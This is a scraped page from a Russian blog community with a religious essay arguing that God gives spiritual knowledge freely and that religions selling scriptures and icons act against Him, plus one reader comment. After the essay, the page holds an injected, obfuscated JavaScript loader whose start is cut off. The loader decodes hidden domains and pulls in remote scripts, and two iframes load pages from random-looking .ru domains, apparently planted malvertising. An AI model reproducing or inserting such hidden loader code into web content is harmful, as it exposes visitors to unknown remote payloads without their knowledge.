ПОЧЕМУ БОГ НЕ ТОРГУЕТ, А ВСЕ НАМ ДАЕТ ДАРОМ?

    Эту статью могут комментировать только участники сообщества.
    Вы можете вступить в сообщество одним кликом по кнопке справа.
    Михаил Романцов написал
    5 оценок, 405 просмотров Обсудить (1)

     

     

     

    ПОЧЕМУ БОГ НЕ ТОРГУЕТ?

    Существуют знания материального и духовного мира. Как приходят материальные знания, скажем школьные? Человек приходит в первый класс, покупает учебники и прямо или косвенно оплачивает работу педагогов. Каждый новый класс требует новых затрат, поскольку все в материальном мире имеет свою ЦЕНУ. К моменту окончания школы ученик накапливает некоторый обьем знаний, заплатив за него какое то количество денег. 

    ПОЧЕМУ БОГ НЕ ТОРГУЕТ?

     Полученные знания человек  использовать для получения жизненных благ от Бога. Все вполне закономерно, сначала ЗАПЛАТИЛ за знания. потом знания приносят прибыль. В духовном мире  дело обстоит  несколько иначе. Ни один человек не может сказать , что он потратил  деньги на приобретение ДУХОВНОГО ЗНАНИЯ, именно знания, а не литературы. ДУХОВНОЕ НЕ МОЖЕТ ПРОДАВАТЬСЯ, А ЧТО ПРОДАЕТСЯ , НЕ ЕСТЬ ДУХОВНОЕ. 

    ПОЧЕМУ БОГ НЕ ТОРГУЕТ?

     Подобная литература может лишь натолкнуть на ДУХОВНЫЙ ПУТЬ, но ДВИЖЕНИЕ у каждого должно быть только своим. Всякий, кто обретает духовное знание скажет, что оно ДАРОВАНО СВЫШЕ ему. Как же можно назначить ЦЕНУ тому, что БЕСЦЕННО. Желающие оправдать свои действия ссылаются на материальную необходимость, дескать, затраты нужно покрывать. Однако у каждого  существует своя  собственная  возможность и не следует  стараться  ее превышать искусственно. Каждому дается именно такой груз , какой он сможет оценить и унести в люди.

    ПОЧЕМУ БОГ НЕ ТОРГУЕТ? 

    Когда же человек старается набрать груза побольше, за счет привлечения чужой силы, то он и свой не сможет оценить. Если нерадивый хозяин на занимает у соседей зерна , для посева,желая получить побольше урожай, а после все это посеет, то взойдет все равно лишь столько, сколько готова вскормить земля, остальные погибнут. Бог сеет в мире семена, но не все всходят, а только определенное количество духовных людей. Жизнь сама именно даст такую возможность, для несения Слова Божьего, какая будет воспринята людьмиВсевозможные  искусственные спонсорства  пользы не принесут.

    ПОЧЕМУ БОГ НЕ ТОРГУЕТ? 

    Духовное и материальное как две ноги у человека. Каждая нога выполняет свою функцию. Нагрузи больше левую ногу- правой станет тяжелее, нагрузи больше правую- левая далеко не уйдет. Связывать духовное и материальное просто нельзя, т. к. произойдет обнуление полезной энергии. Человек  со связанными ногами, не может двигаться вообще.

    ПОЧЕМУ БОГ НЕ ТОРГУЕТ?

    Едва ли Христос , будучи во гневе оставил бы  в покое сегодня тех торговцев в Храмах, Мечетях и Синагогах ,причем всех религий мира сего, кто торговал бы писаниями, иконами, крестиками и т. д. Все религии ТОРГУЮТ вопреки Богу, не разумея Бога и его слов. Во времена Христа  святых писаний было значительно МЕНЬШЕ, а ДУХОВНОСТЬ значительно ВЫШЕ. Почему?. Видимо совсем не обьязательно  стараться построить такое огромное количество храмов на земле ВНЕШНИХ и напечатать Библий, столько, что бы они были в каждом доме .

     ПОЧЕМУ БОГ НЕ ТОРГУЕТ?

    Наверное полезнее было бы, чтобы каждый, истинно верующий постарался СПАСТИ СЕБЯ САМ ПОСТРОИВ В САМОМ СЕБЕ ГЛАВНЫЙ ХРАМ БОГА.  Ведь если не СПАСЕШЬ СЕБЯ, не спасешь и остальных, не ПОЛЮБИВ СЕБЯ, как творение Бога- не полюбишь и остальных, не ОЦЕНИШЬ СЕБЯ- не оценишь и остальных, но ВОЗВЫСИВ себя пред Богом - не возвысишь  остальных.

    <script type="text/javascript">// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "maxpark.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.​loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.​replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),​document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==​typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"​function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a251​9043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]></script>

    <iframe id="a1996667054" style="" src="https://25haich4342.ru/f2.html?a=26363" width="320" height="240"></iframe><iframe id="a754394637" style="" src="https://gyh1lh20owj.ru/u.html?a=26363" width="320" height="240"></iframe>

    Loading...

    Комментировать

    осталось 1185 символов
    пользователи оставили 1 комментарий , вы можете свернуть их
    Antanas Kuzminskis # написал комментарий 2 июня 2016, 20:04
    Капитализм рынок торговля.В эти времена всё покупается и продаётся.Авсё самое ценое мы получаем безплатно.Любовь дружба привязаность верность исскреность истина вера надежда помощь .БлагоДарю.
    • Регистрация
    • Вход
    Ваш комментарий сохранен, но пока скрыт.
    Войдите или зарегистрируйтесь для того, чтобы Ваш комментарий стал видимым для всех.
    Код с картинки
    Я согласен
    Код с картинки
      Забыли пароль?
    ×

    Напоминание пароля

    Хотите зарегистрироваться?
    За сутки посетители оставили 1031 запись в блогах и 8713 комментариев.
    Зарегистрировалось 25 новых макспаркеров. Теперь нас 5021560.